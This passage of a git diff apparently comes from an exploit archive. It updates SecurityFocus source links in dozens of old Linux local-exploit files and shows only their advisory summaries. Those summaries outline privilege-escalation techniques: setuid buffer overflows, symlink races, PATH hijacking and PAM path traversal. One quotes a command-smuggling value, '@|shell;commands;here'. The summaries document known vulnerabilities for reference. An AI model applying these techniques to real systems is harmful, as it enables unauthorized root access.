http://www.securityfocus.com/bid/369/info +source: https://www.securityfocus.com/bid/369/info In Slackware Linux 3.1 and 3.2, the version of color xterm included is vulnerable to a buffer overflow attack that allows for a local user to gain root access. */ diff --git a/exploits/linux/local/19302.c b/exploits/linux/local/19302.c index f6f53229e..107508c30 100644 --- a/exploits/linux/local/19302.c +++ b/exploits/linux/local/19302.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/379/info +// source: https://www.securityfocus.com/bid/379/info There is a serious vulnerability in linux libc affecting all Linux distributions using libc 5.2.18 and below. The vulnerability is centered around the NLSPATH environment variable. Through exporting the oversized and shell-code including buffer to the environment variable NLSPATH, it is possible to exploit any setuid root program that's based on libc [almost all] and gain root access on the machine. diff --git a/exploits/linux/local/19305.c b/exploits/linux/local/19305.c index 8df8f82f6..5599c8536 100644 --- a/exploits/linux/local/19305.c +++ b/exploits/linux/local/19305.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/383/info +// source: https://www.securityfocus.com/bid/383/info // // Similar to the mh vulnerability, a buffer overflow exists in the version of msgchk shipped with RedHat Linux 5.0. The vulnerability allows a user to execute arbritrary commands as root to compromise superuser access. // diff --git a/exploits/linux/local/19311.c b/exploits/linux/local/19311.c index c744b8185..14bafb4fa 100644 --- a/exploits/linux/local/19311.c +++ b/exploits/linux/local/19311.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/393/info +// source: https://www.securityfocus.com/bid/393/info A buffer overrun exists in the /bin/mailx program. This program was originally developed as part of BSD, and is available on many Unix systems. By supplying a long, well crafted buffer as the username argument, an attacker can use it to execuate arbitrary code. On some systems, this will result in the ability to execute code as group mail. diff --git a/exploits/linux/local/19312.c b/exploits/linux/local/19312.c index c55bf1a96..96819694b 100644 --- a/exploits/linux/local/19312.c +++ b/exploits/linux/local/19312.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/393/info +// source: https://www.securityfocus.com/bid/393/info A buffer overrun exists in the /bin/mailx program. This program was originally developed as part of BSD, and is available on many Unix systems. By supplying a long, well crafted buffer as the username argument, an attacker can use it to execuate arbitrary code. On some systems, this will result in the ability to execute code as group mail. diff --git a/exploits/linux/local/19314.c b/exploits/linux/local/19314.c index 4796e35f3..b11214cce 100644 --- a/exploits/linux/local/19314.c +++ b/exploits/linux/local/19314.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/398/info +// source: https://www.securityfocus.com/bid/398/info It is possible to cause a denial of service (remote and local) through generating old, obscure kernel messages (not terminated with \n) in klogd. The problem exists because of a buffer overflow in the klogd handling of kernel messages. It is possible to gain local root access through stuffing shellcode into printk() messages which contain user-controllable variables (eg, filenames). What makes this problem strange, however, is that it was fixed two years ago. Two of the most mainstream linux distributions (Slackware Linux and RedHat Linux), up until recently, are known to have been shipping with the very old vulnerable version. Fixes and updates were released promptly. There is no data on other distributions. diff --git a/exploits/linux/local/19315.c b/exploits/linux/local/19315.c index da61a32f9..34babef61 100644 --- a/exploits/linux/local/19315.c +++ b/exploits/linux/local/19315.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/398/info +// source: https://www.securityfocus.com/bid/398/info It is possible to cause a denial of service (remote and local) through generating old, obscure kernel messages (not terminated with \n) in klogd. The problem exists because of a buffer overflow in the klogd handling of kernel messages. It is possible to gain local root access through stuffing shellcode into printk() messages which contain user-controllable variables (eg, filenames). What makes this problem strange, however, is that it was fixed two years ago. Two of the most mainstream linux distributions (Slackware Linux and RedHat Linux), up until recently, are known to have been shipping with the very old vulnerable version. Fixes and updates were released promptly. There is no data on other distributions. diff --git a/exploits/linux/local/19360.c b/exploits/linux/local/19360.c index aa47e1665..8064f9e52 100644 --- a/exploits/linux/local/19360.c +++ b/exploits/linux/local/19360.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/475/info +// source: https://www.securityfocus.com/bid/475/info A buffer overflow is present in linux libc 5.4.32 and below that allows a user to obtain local root access under some conditions. The overflow is in the function vsyslog() and exploitable through the suid root program su, which passes the arg that exceeds boundaries directly to the function. The consequences of this problem being exploited that particular way are allowing a user to execute arbitrary code and gain root access. diff --git a/exploits/linux/local/19370.c b/exploits/linux/local/19370.c index ccb849e4d..917a92847 100644 --- a/exploits/linux/local/19370.c +++ b/exploits/linux/local/19370.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/488/info +// source: https://www.securityfocus.com/bid/488/info Accelerated-X, also known as Accel-X, is a popular commercial X server available from Xi Graphics. The servers are normally installed setuid root, and contain multiple buffer overflow vulnerabilities. These vulnerabilities were found in the passing of oversized command line arguments to the servers causing the stack to be overwritten and the flow of execution for the Xserver changed. Two of these vulnerabilities is known to be related to the -query argument and the DISPLAY environment variable, upon neither of which is bounds checking performed. The consequence of these vulnerabilities being exploited is local root compromise. diff --git a/exploits/linux/local/19371.c b/exploits/linux/local/19371.c index e9d7c1f4e..d4525e122 100644 --- a/exploits/linux/local/19371.c +++ b/exploits/linux/local/19371.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/490/info +// source: https://www.securityfocus.com/bid/490/info VMWare is virtual machine software produced by VMWare inc. VMWare version 1.0.1 for Linux is vulnerable to a buffer overflow attack. Since VMWare is installed with binaries that are setuid root, local users can exploit the hole allowing for arbitrary code to be executed as root. The consequences are a local root compromise. diff --git a/exploits/linux/local/19373.c b/exploits/linux/local/19373.c index 36ea2e1e5..8746874a5 100644 --- a/exploits/linux/local/19373.c +++ b/exploits/linux/local/19373.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/496/info +// source: https://www.securityfocus.com/bid/496/info // // Lsof is an open file management utility included with many linux distributions. When run setuid root or setgid kmem, it is subject to a buffer overflow that can lead to regular users gaining root priveleges. // diff --git a/exploits/linux/local/19374.c b/exploits/linux/local/19374.c index 303e613a5..d7133d1ee 100644 --- a/exploits/linux/local/19374.c +++ b/exploits/linux/local/19374.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/496/info +// source: https://www.securityfocus.com/bid/496/info Lsof is an open file management utility included with many linux distributions. When run setuid root or setgid kmem, it is subject to a buffer overflow that can lead to regular users gaining root priveleges. diff --git a/exploits/linux/local/19384.c b/exploits/linux/local/19384.c index 511b80b61..826d8e23b 100644 --- a/exploits/linux/local/19384.c +++ b/exploits/linux/local/19384.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/508/info +// source: https://www.securityfocus.com/bid/508/info The LPRng software is an enhanced, extended, and portable version of the Berkeley LPR software (the standard UNIX printer spooler) that ships with Debian GNU/Linux. When root controls the print queue, the authentication that is used is based on whether the client source port connecting to lpd is privileged or not. Apparently, lpd does not check the source port properly, and it is possible for any local user to control the print queue with a modified client. The consequences of this vulnerability being exploited is a compromise of print queue control. diff --git a/exploits/linux/local/19419.c b/exploits/linux/local/19419.c index e4113bf15..ff2eda0c8 100644 --- a/exploits/linux/local/19419.c +++ b/exploits/linux/local/19419.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/523/info +source: https://www.securityfocus.com/bid/523/info This vulnerability has to do with the division of the address space between a user process and the kernel. Because of a bug, if you select a non-standard memory configuration, sometimes user level processes may be given access upto 252Mb of memory that are really part of the kernel. This allows the process to first search for its memory descriptor and then extend it to cover the rest of the kernel memory. It can then search for a task_struct and modify it so its uid is zero (root). This vulnerability is very obscure, only works on that version of linux, and only if you select a non-standard memory configuration. diff --git a/exploits/linux/local/19422.txt b/exploits/linux/local/19422.txt index aeb60e5e5..544b72edf 100644 --- a/exploits/linux/local/19422.txt +++ b/exploits/linux/local/19422.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/525/info +source: https://www.securityfocus.com/bid/525/info Patrol 3.2, installed out of the box, allows for a local root compromise or denial of service. The vulnerability lies in the creation of a file by snmpagnt that is owned by the owner of the parent directory of the file and possibly world writeable. A local user can specify any file (/.rhosts) and create it / set the permissions according to the user's umask. diff --git a/exploits/linux/local/19428.c b/exploits/linux/local/19428.c index b6d2338c5..7e80ca60b 100644 --- a/exploits/linux/local/19428.c +++ b/exploits/linux/local/19428.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/536/info +source: https://www.securityfocus.com/bid/536/info There were a number of vulnerabilities in the Samba package pre-2.0.5. The first is a possible denial of service in nmbd (the netbios name service daemon), which resulted in nmbd spinning until killed. The second vulnerability known is a possible buffer overflow problem in smbd which is not exploit in the default install/configuration. A function in the messaging system could be exploited and arbitrary code executed as root if the "message command" was set in smb.conf. There was also a race condition vulnerability which could possible allow an attacker to mount arbitrary points in the filesystem if smbmnt was setuid root (which it is not by default). */ diff --git a/exploits/linux/local/19429.sh b/exploits/linux/local/19429.sh index 404223da8..aba652038 100755 --- a/exploits/linux/local/19429.sh +++ b/exploits/linux/local/19429.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/538/info +source: https://www.securityfocus.com/bid/538/info Rational Software's ClearCase product includes a vulnerability whereby an unprivileged user can have any readable executable set to SUID root.. A 1.5 meg file is copied and then chmod'ed to SUID, and during the time this file is being copied it can be unlinked and replaced with another. diff --git a/exploits/linux/local/19464.c b/exploits/linux/local/19464.c index 776763e83..8fab9bfb4 100644 --- a/exploits/linux/local/19464.c +++ b/exploits/linux/local/19464.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/588/info +// source: https://www.securityfocus.com/bid/588/info A buffer overflow existed in libtermcap's tgetent() function, which could cause the user to execute arbitrary code if they were able to supply their own termcap file. Versions of libtermcap 2.0.8 and earliear are vulnerable. diff --git a/exploits/linux/local/19465.c b/exploits/linux/local/19465.c index 373c97ac9..9b2373f3b 100644 --- a/exploits/linux/local/19465.c +++ b/exploits/linux/local/19465.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/588/info +// source: https://www.securityfocus.com/bid/588/info A buffer overflow existed in libtermcap's tgetent() function, which could cause the user to execute arbitrary code if they were able to supply their own termcap file. Versions of libtermcap 2.0.8 and earliear are vulnerable. diff --git a/exploits/linux/local/19467.c b/exploits/linux/local/19467.c index 0dbce1b7b..e4ccdedf2 100644 --- a/exploits/linux/local/19467.c +++ b/exploits/linux/local/19467.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/597/info +// source: https://www.securityfocus.com/bid/597/info // pt_chown is a program included with glibc 2.1.x that exists to aid the proper allocation of terminals for non-suid programs that don't have devpts support. It is installed setuid root, and is shipped with RedHat Linux 6.0. As it stands, pt_chown is vulnerable to an attack that allows malicious users to write aribtrary data to tty input/output streams (open file desciptors -> tty) that don't belong to them (you could theoretically get full control of the terminal). This is done by fooling the program into giving you access (it lacks security checks). Whether you can be compromised or not depends on the software you are using and whether it has support for devpts (screen, midnight commander, etc). The consequences are hijacking of terminals, possibly leading to a root compromise. diff --git a/exploits/linux/local/19469.c b/exploits/linux/local/19469.c index b28d5ece6..7733242a8 100644 --- a/exploits/linux/local/19469.c +++ b/exploits/linux/local/19469.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/602/info +// source: https://www.securityfocus.com/bid/602/info The version of Vixie cron that ships with RedHat versions 4.2, 5.2 and 6.0 is vulnerable to a local buffer overflow attack. By utilizing the MAILTO environment variable, a buffer can be overflown in the cron_popen() function, allowing an attacker to execute arbitrary code. Vixie cron daemon is installed setuid root by default, allowing for a local root compromise. Recent versions of Debian GNU/Linux have been confirmed to not be vulnerable to this attack. diff --git a/exploits/linux/local/19470.c b/exploits/linux/local/19470.c index f1a305171..90ca89994 100644 --- a/exploits/linux/local/19470.c +++ b/exploits/linux/local/19470.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/602/info +// source: https://www.securityfocus.com/bid/602/info The version of Vixie cron that ships with RedHat versions 4.2, 5.2 and 6.0 is vulnerable to a local buffer overflow attack. By utilizing the MAILTO environment variable, a buffer can be overflown in the cron_popen() function, allowing an attacker to execute arbitrary code. Vixie cron daemon is installed setuid root by default, allowing for a local root compromise. Recent versions of Debian GNU/Linux have been confirmed to not be vulnerable to this attack. diff --git a/exploits/linux/local/19474.txt b/exploits/linux/local/19474.txt index 90d27de03..90544d011 100644 --- a/exploits/linux/local/19474.txt +++ b/exploits/linux/local/19474.txt @@ -1,6 +1,6 @@ Caldera OpenLinux 2.2 ,Debian Linux 2.1/2.2,RedHat Linux <= 6.0 Vixie Cron MAILTO Sendmail Vulnerability -source: http://www.securityfocus.com/bid/611/info +source: https://www.securityfocus.com/bid/611/info Failure by the vixie cron daemon from validating the contents of a user supplied environment variable allow a malicious users to pass arbitrary command line arguments to sendmail while running as the root user. diff --git a/exploits/linux/local/19485.c b/exploits/linux/local/19485.c index bbf1d5810..ebf7ca566 100644 --- a/exploits/linux/local/19485.c +++ b/exploits/linux/local/19485.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/617/info +// source: https://www.securityfocus.com/bid/617/info There are several buffer overflows in the setuid root components of the Mars Netware Emulator package. They allow for a local root compromise through the overflowing of buffers without bounds checking. It is to be assumed that all versions prior to and including 0.99 are vulnerable to these attacks. diff --git a/exploits/linux/local/19499.c b/exploits/linux/local/19499.c index d0753d535..9bbce44a9 100644 --- a/exploits/linux/local/19499.c +++ b/exploits/linux/local/19499.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/638/info +// source: https://www.securityfocus.com/bid/638/info A buffer overflow vulnerability in the shared X library may allows local users to obtain higher privileges. Any setuid applications linked against the library are possibly vulnerable. The vulnerability is in the handling of the '-bg' command line parameter. diff --git a/exploits/linux/local/19500.c b/exploits/linux/local/19500.c index c26d2ca97..99d3f8114 100644 --- a/exploits/linux/local/19500.c +++ b/exploits/linux/local/19500.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/638/info +// source: https://www.securityfocus.com/bid/638/info A buffer overflow vulnerability in the shared X library may allows local users to obtain higher privileges. Any setuid applications linked against the library are possibly vulnerable. The vulnerability is in the handling of the '-bg' command line parameter. diff --git a/exploits/linux/local/19501.c b/exploits/linux/local/19501.c index 8b934500d..d3faf1568 100644 --- a/exploits/linux/local/19501.c +++ b/exploits/linux/local/19501.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/641/info +source: https://www.securityfocus.com/bid/641/info TRU64/DIGITAL UNIX 4.0 d/f,AIX <= 4.3.2,Common Desktop Environment <= 2.1 20, IRIX <= 6.5.14,Solaris <= 7.0,SunOS <= 4.1.4 TTSession Buffer Overflow Vulnerability diff --git a/exploits/linux/local/19508.sh b/exploits/linux/local/19508.sh index 46e119adf..a48571af7 100755 --- a/exploits/linux/local/19508.sh +++ b/exploits/linux/local/19508.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/656/info +source: https://www.securityfocus.com/bid/656/info A buffer overflow vulnerability in sscw's handling of the HOME environment variable allows local users to gain root privileges. diff --git a/exploits/linux/local/19510.pl b/exploits/linux/local/19510.pl index da4c6bd53..f9ef5707a 100755 --- a/exploits/linux/local/19510.pl +++ b/exploits/linux/local/19510.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/660/info +source: https://www.securityfocus.com/bid/660/info A vulnerability in SSH's creation of the authentication agent UNIX domain socket allows local users to create a UNIX domain socket with an arbitrary file name in the system. diff --git a/exploits/linux/local/19511.c b/exploits/linux/local/19511.c index cab77721c..142e106c0 100644 --- a/exploits/linux/local/19511.c +++ b/exploits/linux/local/19511.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/661/info +source: https://www.securityfocus.com/bid/661/info Knox Software Arkeia 4.0 Backup rnavc & nlserverd HOME Environment Variable Buffer Overflow diff --git a/exploits/linux/local/19512.sh b/exploits/linux/local/19512.sh index 7e524fab7..927e89e28 100755 --- a/exploits/linux/local/19512.sh +++ b/exploits/linux/local/19512.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/663/info +source: https://www.securityfocus.com/bid/663/info A buffer overflow vulnerabilityin GNOME's shared libraries handling of the 'espeaker' command line argument may allow local users to attack setuid binaries linked against these libraries to obtain root access. diff --git a/exploits/linux/local/19544.c b/exploits/linux/local/19544.c index 6555360ed..bb0d90a5c 100644 --- a/exploits/linux/local/19544.c +++ b/exploits/linux/local/19544.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/707/info +source: https://www.securityfocus.com/bid/707/info BSD/OS 2.1,FreeBSD 2.1.5,NeXTstep 4.0/4.1,SGI IRIX 6.4,SunOS 4.1.3/4.1.4 lpr Buffer Overrun Vulnerability (1) diff --git a/exploits/linux/local/19565.sh b/exploits/linux/local/19565.sh index 135088dec..57c2080ed 100755 --- a/exploits/linux/local/19565.sh +++ b/exploits/linux/local/19565.sh @@ -1,5 +1,5 @@ #! /bin/sh -#source: http://www.securityfocus.com/bid/738/info +#source: https://www.securityfocus.com/bid/738/info # #cdwtools is a package of utilities for cd-writing. The linux version of these utilities, which ships with S.u.S.E linux 6.1 and 6.2, is vulnerable to several local root #compromises. It is known that there are a number of ways to exploit these packages, including buffer overflows and /tmp symlink attacks. # diff --git a/exploits/linux/local/19602.c b/exploits/linux/local/19602.c index e7dfba891..32bf911d5 100644 --- a/exploits/linux/local/19602.c +++ b/exploits/linux/local/19602.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/774/info +// source: https://www.securityfocus.com/bid/774/info Through exploiting a combination of seemingly low-risk vulnerabilities in sendmail, it is possible for a malicious local user to have an arbitrary program inherit (or "hijack") the file descriptor for the socket listening on (priviliged) port 25. diff --git a/exploits/linux/local/19655.txt b/exploits/linux/local/19655.txt index e1989a87b..4e4c9c263 100644 --- a/exploits/linux/local/19655.txt +++ b/exploits/linux/local/19655.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/843/info +source: https://www.securityfocus.com/bid/843/info A buffer overflow vulnerability exists in the RSAREF cryptographic library which may possibly make any software using the library vulnerable. diff --git a/exploits/linux/local/19676.c b/exploits/linux/local/19676.c index cde486107..b231e2d2d 100644 --- a/exploits/linux/local/19676.c +++ b/exploits/linux/local/19676.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/871/info +// source: https://www.securityfocus.com/bid/871/info Certain versions of FreeBSD (3.3 Confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package. The binary/game in question, xsoldier, is a setuid root binary meant to be run via an X windows console. diff --git a/exploits/linux/local/19677.c b/exploits/linux/local/19677.c index 68bb46a08..845c80666 100644 --- a/exploits/linux/local/19677.c +++ b/exploits/linux/local/19677.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/871/info +source: https://www.securityfocus.com/bid/871/info Certain versions of FreeBSD (3.3 Confirmed) and Linux (Mandrake confirmed) ship with a vulnerable binary in their X11 games package. The binary/game in question, xsoldier, is a setuid root binary meant to be run via an X windows console. diff --git a/exploits/linux/local/19698.txt b/exploits/linux/local/19698.txt index 771d65e23..173fba6c3 100644 --- a/exploits/linux/local/19698.txt +++ b/exploits/linux/local/19698.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/902/info +source: https://www.securityfocus.com/bid/902/info It is possible to execute arbitrary commands with elevated privileges through exploiting the majordomo binary, "resend". A setuid root wrapper program calls resend after setuid()ing and setgid()ing to lowered (but still elevated) privileges which it runs resend with. resend contains a call to open() (it is a perl script), which can be made to execute shell commands if a '|' is the first character it is passed, so if the first parameter to resend is '@|shell;commands;here', the shell commands will be executed with resend's privileges. diff --git a/exploits/linux/local/19699.txt b/exploits/linux/local/19699.txt index 8ec5cfdd4..2778d5f13 100644 --- a/exploits/linux/local/19699.txt +++ b/exploits/linux/local/19699.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/903/info +source: https://www.securityfocus.com/bid/903/info It is possible for a local user to gain majordomo privileges through a vulnerability which allows privileged arbitrary commands to be executed. If the -C parameter is passed to majordomo (or one of several other scripts) when run with the setuid root wrapper, the argument to -C will be executed with majordomo privileges. diff --git a/exploits/linux/local/19700.c b/exploits/linux/local/19700.c index 69db75468..e441572e5 100644 --- a/exploits/linux/local/19700.c +++ b/exploits/linux/local/19700.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/903/info +// source: https://www.securityfocus.com/bid/903/info It is possible for a local user to gain majordomo privileges through a vulnerability which allows privileged arbitrary commands to be executed. If the -C parameter is passed to majordomo (or one of several other scripts) when run with the setuid root wrapper, the argument to -C will be executed with majordomo privileges. diff --git a/exploits/linux/local/19709.sh b/exploits/linux/local/19709.sh index f8e352169..2bd90940b 100755 --- a/exploits/linux/local/19709.sh +++ b/exploits/linux/local/19709.sh @@ -1,6 +1,6 @@ Mandrake 6.0/6.1,RedHat 6.0/6.1,Turbolinux 3.5 b2/4.2/4.4/6.0.2 userhelper/PAM Path Vulnerability (1) -source: http://www.securityfocus.com/bid/913/info +source: https://www.securityfocus.com/bid/913/info Because of double path vulnerabilities in the binary userhelper and PAM, it is possible to get root locally on RedHat 6.0 and 6.1 systems. Both userhelper and PAM follow ".." paths and userhelper allows you to specifiy a program to execute as an argument to the -w parameter (which is expected to have an entry in /etc/security/console.apps). Because of this, it's possible to specifiy a program such as "../../../tmp/myprog", which would (to userhelper) be "/etc/security/console.apps/../../../tmp/myprog". If "myprog" exists, PAM will then try to execute it (with the same filename). PAM first does a check to see if the configuration file for "../../../tmp/myprog" is in /etc/pam.d/ but also follows ".." directories -- to an attacker's custom pam configuration file. Specified inside the malicious configuration file (/tmp/myprog) would be arbitrary shared libraries to be opened with setuid privileges. The arbitrary libraries can be created by an attacker specifically to compromise superuser access, activating upon dlopen() by PAM. diff --git a/exploits/linux/local/19710.c b/exploits/linux/local/19710.c index da70867b5..d0f7d312c 100644 --- a/exploits/linux/local/19710.c +++ b/exploits/linux/local/19710.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/913/info +// source: https://www.securityfocus.com/bid/913/info Because of double path vulnerabilities in the binary userhelper and PAM, it is possible to get root locally on RedHat 6.0 and 6.1 systems. Both userhelper and PAM follow ".." paths and userhelper allows you to specifiy a program to execute as an argument to the -w parameter (which is expected to have an entry in /etc/security/console.apps). Because of this, it's possible to specifiy a program such as "../../../tmp/myprog", which would (to userhelper) be "/etc/security/console.apps/../../../tmp/myprog". If "myprog" exists, PAM will then try to execute it (with the same filename). PAM first does a check to see if the configuration file for "../../../tmp/myprog" is in /etc/pam.d/ but also follows ".." directories -- to an attacker's custom pam configuration file. Specified inside the malicious configuration file (/tmp/myprog) would be arbitrary shared libraries to be opened with setuid privileges. The arbitrary libraries can be created by an attacker specifically to compromise superuser access, activating upon dlopen() by PAM. diff --git a/exploits/linux/local/19723.txt b/exploits/linux/local/19723.txt index 9a0ab82d1..78dacddaa 100644 --- a/exploits/linux/local/19723.txt +++ b/exploits/linux/local/19723.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/928/info +source: https://www.securityfocus.com/bid/928/info A component of the "Corel Update" utility distributed with Corel's Linux OS is vulnerable to a local PATH vulnerability. The binary "get_it", which is stored in /usr/X11R6/bin, is setuid root installed by default on all Corel LinuxOS systems (it's part of their .deb package install/update utils). get_it relies on PATH to be valid when it calls 'cp' (without the full path), making it possible to spawn an arbitrary program (called 'cp') with inherited root privs by changing the first searched path to one in which a malicious cp lies. The consequences are immediate local root compromise. diff --git a/exploits/linux/local/19727.c b/exploits/linux/local/19727.c index 118988e5b..8f51d76f6 100644 --- a/exploits/linux/local/19727.c +++ b/exploits/linux/local/19727.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/942/info +// source: https://www.securityfocus.com/bid/942/info Vpopmail (vchkpw) is free GPL software package built to help manage virtual domains and non /etc/passwd email accounts on Qmail mail servers. This package is developed by Inter7 (Referenced in the 'Credit' section) and is not shipped, maintained or supported by the main Qmail distribution. diff --git a/exploits/linux/local/19735.txt b/exploits/linux/local/19735.txt index 3ba31a2c3..53155ef8d 100644 --- a/exploits/linux/local/19735.txt +++ b/exploits/linux/local/19735.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/958/info +source: https://www.securityfocus.com/bid/958/info A vulnerability exists in the apcd package, as shipped in Debian GNU/Linux 2.1. By sending the apcd process a SIGUSR1, a file will be created in /tmp called upsstat. This file contains information about the status of the APC device. This file is not opened securely, however, and it is possible for an attacker to create a symlink with this name to another place on the file system. This could, in turn, lead to a compromise of the root account. diff --git a/exploits/linux/local/19762.c b/exploits/linux/local/19762.c index d9f6c2bf0..ed6db2272 100644 --- a/exploits/linux/local/19762.c +++ b/exploits/linux/local/19762.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1003/info +// source: https://www.securityfocus.com/bid/1003/info FTP Explorer includes the option to store profiles of visited FTP sites. The user's name and password can also be stored. These stored values are kept in the registry, under the key HKCU\Software\FTP Explorer\Profiles\ProfileName\ . The password is encrypted, but the encryption mechanism is weak and can easily be broken. diff --git a/exploits/linux/local/19763.txt b/exploits/linux/local/19763.txt index a9efd3f3e..0c88fc138 100644 --- a/exploits/linux/local/19763.txt +++ b/exploits/linux/local/19763.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1005/info +source: https://www.securityfocus.com/bid/1005/info A vulnerability exists in the manner in which RedHat Linux 6.0 protects the obtaining of a shell by booting single user mode. RedHat will prompt for the root password upon entering single user mode. Pressing ^C (causing a SIGINT to be sent) immediately results in a root shell being made available. diff --git a/exploits/linux/local/19764.txt b/exploits/linux/local/19764.txt index 6c4e82d37..f8a7acc82 100644 --- a/exploits/linux/local/19764.txt +++ b/exploits/linux/local/19764.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1007/info +source: https://www.securityfocus.com/bid/1007/info Several vulnerabilities exist in the buildxconfig program, as included with Corel Linux 1.0. Using this program, it is likely that a local user could elevate privileges. diff --git a/exploits/linux/local/19765.txt b/exploits/linux/local/19765.txt index baee77edc..b89e02a80 100644 --- a/exploits/linux/local/19765.txt +++ b/exploits/linux/local/19765.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1008/info +source: https://www.securityfocus.com/bid/1008/info A vulnerability exists in the setxconf utility, as shipped with Corel Linux 1.0. The -T option to setxconf will run xinit, which euid root. xinit, when executed, will invoke the contents on ~/.xserverrc. A malicious user could therefore execute commands as root. diff --git a/exploits/linux/local/19778.c b/exploits/linux/local/19778.c index e602fd234..818ddc5ab 100644 --- a/exploits/linux/local/19778.c +++ b/exploits/linux/local/19778.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1011/info +source: https://www.securityfocus.com/bid/1011/info RedHat 4.0/4.1/4.2/5.0/5.1/5.2/6.0/6.2,RedHat man 1.5,Turbolinux man 1.5,Turbolinux 3.5/4.2/4.4 man Buffer Overrun Vulnerability diff --git a/exploits/linux/local/19779.c b/exploits/linux/local/19779.c index 360d7b6df..90eef214a 100644 --- a/exploits/linux/local/19779.c +++ b/exploits/linux/local/19779.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1011/info +source: https://www.securityfocus.com/bid/1011/info RedHat 4.0/4.1/4.2/5.0/5.1/5.2/6.0/6.2,RedHat man 1.5,Turbolinux man 1.5,Turbolinux 3.5/4.2/4.4 man Buffer Overrun Vulnerability diff --git a/exploits/linux/local/19787.txt b/exploits/linux/local/19787.txt index a9053daae..2dfead473 100644 --- a/exploits/linux/local/19787.txt +++ b/exploits/linux/local/19787.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1030/info +source: https://www.securityfocus.com/bid/1030/info A vulnerability exists in the configuration of Dosemu, the DOS emulator, as shipped with Corel Linux 1.0. Dosemu documentation cautions that the system.com binary should not be made available to users, as it implements the system() libc call. Users can use this command to execute commands as root, and obtain elevated access to the system. diff --git a/exploits/linux/local/19794.txt b/exploits/linux/local/19794.txt index 6d1274afd..cb1d0a1a6 100644 --- a/exploits/linux/local/19794.txt +++ b/exploits/linux/local/19794.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1035/info +source: https://www.securityfocus.com/bid/1035/info A vulnerability exists in the installation program for Oracle 8.1.5i. The Oracle installation scripts will create a directory named /tmp/orainstall, owned by oracle:dba, mode 711. Inside of this directory it will create a shell script named orainstRoot.sh, mode 777. The installation script will then stop and ask the person installing to run this script. The installation program at no point attempts to determine if the directory or script already exist. This makes it possible to create a symbolic link from the orainstRoot.sh file to elsewhere on the file system. This could be used to create a .rhosts file, for instance, and gain access to the root account. In addition, since the orainstRoot.sh file is mode 777, it is possible for any user on the machine to edit this script to execute arbitrary commands when run by root. Again, this can result in the compromise of the root account. diff --git a/exploits/linux/local/19802.c b/exploits/linux/local/19802.c index 1ea4e1e75..bfb322945 100644 --- a/exploits/linux/local/19802.c +++ b/exploits/linux/local/19802.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1047/info +// source: https://www.securityfocus.com/bid/1047/info wmcdplay is cdplayer generally used with the WindowMaker X11 window-manager on unix systems. While wmcdplay is rarely installed at all by default, when it is installed it is typically set setuid root. wmcdplay is vulnerable to a buffer overflow attack due to lack of bounds checking on an argument it is passed. As a result, a local user can elevate their priviliges to root through overruning the stack and executing arbitrary code with the effective user-id of the process (root). diff --git a/exploits/linux/local/19803.txt b/exploits/linux/local/19803.txt index 4a23fa132..cc45d74dd 100644 --- a/exploits/linux/local/19803.txt +++ b/exploits/linux/local/19803.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1047/info +source: https://www.securityfocus.com/bid/1047/info wmcdplay is cdplayer generally used with the WindowMaker X11 window-manager on unix systems. While wmcdplay is rarely installed at all by default, when it is installed it is typically set setuid root. wmcdplay is vulnerable to 